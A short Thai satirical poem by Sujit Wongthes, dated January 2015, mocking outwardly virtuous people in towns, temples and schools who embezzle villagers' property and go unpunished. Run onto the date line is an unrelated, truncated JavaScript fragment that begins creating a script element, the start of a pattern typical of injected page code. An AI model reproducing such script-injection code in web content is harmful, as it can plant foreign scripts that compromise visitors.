แหล่งคนดี

 

เมืองบ้านวัดโรงเรียน

บ้างซ่อนแอบแนบเนียนมหาศาล

แหล่งคนดีมีบุญบริวาร

เบียดบังทรัพย์ชาวบ้านแล้วลอยนวล

 

สุจิตต์ วงษ์เทศ

ศุกร์ 16 มกราคม 2558var d=document;var s=d.createElement(‘script’);